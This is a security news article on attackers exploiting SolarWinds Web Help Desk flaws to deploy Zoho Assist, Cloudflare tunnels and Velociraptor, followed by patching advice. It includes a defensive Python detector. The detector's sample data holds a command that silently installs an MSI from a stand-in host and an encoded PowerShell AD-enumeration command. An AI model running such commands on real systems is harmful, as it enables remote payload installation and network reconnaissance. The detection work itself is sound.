Another active exploitation of SolarWinds Web Help Desk detected

Huntress researchers are seeing threat actors exploiting the SolarWinds Web Help Desk vulnerability across three customers. The activity stems from the recently disclosed flaws affecting the tool.
- Active exploitation of newly disclosed SolarWinds Web Help Desk vulnerabilities is underway, with attackers rapidly weaponizing internet-exposed instances for remote code execution and follow-on compromise.
- Huntress observed threat actors chaining legitimate tools like Zoho Assist, Cloudflare tunnels, and Velociraptor to establish persistence, conduct AD reconnaissance, and gain enterprise-wide control.
- Organizations should assume unpatched Web Help Desk versions are vulnerable and urgently update, restrict admin access behind VPNs or firewalls, and reset credentials to reduce risk.
It’s not been a good week for SolarWinds, whose Web Help Desk is a popular IT ticketing software used widely by the US federal government and many private education and healthcare organizations.
First, a remote code execution vulnerability, tracked as CVE-2025-40551, was added to CISA’s Known Exploited Vulnerabilities Catalog.
Then, the Microsoft Defender Research Team also discussed CVE-2025-26399 and said it observed a multi-stage intrusion in which threat actors exploited internet-exposed SolarWinds Web Help Desk instances.
CISA also warned that the vulnerability was being actively exploited. That’s indeed true – active weaponization of a legitimate but heavily abused administrative tool is now accelerating.
Late last week, Huntress analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Assist and Cloudflare tunnels for persistence, as well as Velociraptor for command and control.
The attack chain began with wrapper.exe, the WHD service wrapper, spawning java.exe, the underlying Tomcat-based application. From there, the Java process executed cmd.exe to silently install a remote MSI payload.
The latter delivered a Zoho ManageEngine RMM (Zoho Assist) agent staged via the Catbox file-hosting service.
While Zoho Assist is a legitimate remote management tool, it has become a common post-exploitation choice due to its ability to provide persistent, unattended access.
In this case, the agent was registered to an attacker-controlled Zoho account linked to a Proton Mail address, enabling immediate interactive control.
According to Huntress, the campaign shows how quickly attackers can move from a single internet-exposed management interface to full interactive control, persistence, and enterprise-wide visibility.
This activity aligns closely with Microsoft’s February 6th advisory confirming in-the-wild exploitation of SolarWinds WHD vulnerabilities for remote code execution and follow-on tooling deployment.
Once the RMM agent was active, the threat actor pivoted to hands-on keyboard activity and initiated Active Directory reconnaissance, Huntress explained in a blog post. Essentially, this means mapping domain-joined systems and prioritizing targets.
Then, the attacker deployed Velociraptor, an open-source Digital Forensics and Incident Response platform. It’s designed for defenders, but its ability to execute commands, collect artifacts, and remotely control endpoints makes it an effective command-and-control framework when misused.
Interestingly, the observed deployment used Velociraptor version 0.73.4, an outdated release with a known privilege escalation vulnerability that has appeared in prior campaigns.
The Velociraptor client communicated with attacker infrastructure hosted behind a Cloudflare Worker, and with Velociraptor then running as a Windows service, the attacker executed a rapid sequence of base64-encoded PowerShell commands.
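As an added example (not code from the Huntress or Cybernews write-up), the following Python detector runs over constructed Sysmon-style process-creation records and flags the two stages described above: WHD's java.exe spawning cmd.exe to silently install an MSI fetched over HTTP, and a Velociraptor process launching base64-encoded PowerShell whose decoded text enumerates Active Directory. The install paths, the hosting domain, and the field names are assumptions for the sample data.

```python
import base64
import re
# Constructed Sysmon-style process-creation records (illustrative, not telemetry from the incident).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\SolarWinds\WebHelpDesk\bin\wrapper.exe",
     "Image": r"C:\Program Files\SolarWinds\WebHelpDesk\bin\jre\bin\java.exe",
     "CommandLine": "java.exe org.apache.catalina.startup.Bootstrap start"},
    {"ParentImage": r"C:\Program Files\SolarWinds\WebHelpDesk\bin\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c msiexec /i http://files.example.invalid/agent.msi /quiet /qn"},
    {"ParentImage": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + base64.b64encode("Get-ADComputer -Filter *".encode("utf-16le")).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def decode_encoded_command(cmdline):
    # PowerShell's -EncodedCommand (also -e / -ec / -enc) carries UTF-16LE text as base64.
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def detect(event):
    # Returns the names of the rules that fire for one process-creation event.
    parent, image = _basename(event["ParentImage"]), _basename(event["Image"])
    cmd = event["CommandLine"]
    findings = []
    # Stage 1: WHD's Java process runs cmd.exe to silently install an MSI fetched over HTTP(S).
    if parent == "java.exe" and image == "cmd.exe" and re.search(
            r"msiexec\b.*\s/i\s+https?://\S+.*/q(n|uiet)\b", cmd, re.I):
        findings.append("whd_java_remote_msi_install")
    # Stage 2: a Velociraptor process launches PowerShell with a base64-encoded command.
    if parent.startswith("velociraptor") and image == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("velociraptor_encoded_powershell")
            # AD enumeration cmdlets in the decoded text mark the reconnaissance step.
            if re.search(r"\bGet-AD(Computer|User|Domain)\b", decoded, re.I):
                findings.append("ad_recon_in_decoded_command")
    return findings
```

Run `detect` over each record in a live feed of Sysmon Event ID 1 entries; the first rule keys on the WHD parent chain, so it stays quiet for ordinary administrative MSI installs started from an interactive session.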
Needless to say, organizations running SolarWinds Web Help Desk should urgently update to versions that remediate the vulnerabilities. All prior versions should be considered vulnerable.
Plus, Web Help Desk administrative interfaces shouldn’t be publicly accessible – users should place the tool behind a VPN or firewall and remove direct internet access to admin paths. Passwords should also be reset for all relevant accounts.